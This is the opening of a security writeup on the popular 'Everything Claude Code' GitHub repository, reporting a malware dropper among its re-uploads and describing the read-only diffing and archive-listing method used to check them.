affaan-m/ECC — better known as Everything Claude Code — has over 213,000 GitHub stars, making it one of the most-starred repositories on the platform. When something goes that viral, two security events follow automatically: people install it without reading it, and re-uploads start appearing. We looked at both.
The headline: most of the re-uploads are harmless stale copies — but one is a malware dropper, a fake "download toolkit" that ships an obfuscated LuaJIT payload and tells non-technical users to double-click it. The original repo isn't malware, but it does install a large, globally-active, auto-executing surface that most people clicking install have never reckoned with.
This is an evidence-based writeup. Every claim about a repo we name is backed by a file you can check yourself; for the re-uploads we deliberately don't name, we describe our method so you can reproduce the check. Nothing below is a how-to for abuse.
How we looked
We cloned the original plus 19 public re-uploads and, for each one, diffed the full file tree against a fresh copy of upstream (git diff --no-index) and checked the clone's HEAD commit and tree hash against upstream history via the GitHub API, then hand-read the parts that actually run on your machine: hooks/, the installer, package.json, .mcp.json, and any bundled archives. Archives were never extracted to disk: we listed their contents (unzip -l) and streamed individual files read-only (unzip -p); nothing from any repo was executed. For the original's prompt-injection surface we counted the auto-loadable instruction files and grepped the tree for injection/exfiltration and pipe-to-shell markers. One honest caveat: for the npm packages we read registry metadata, not the unpacked tarballs.
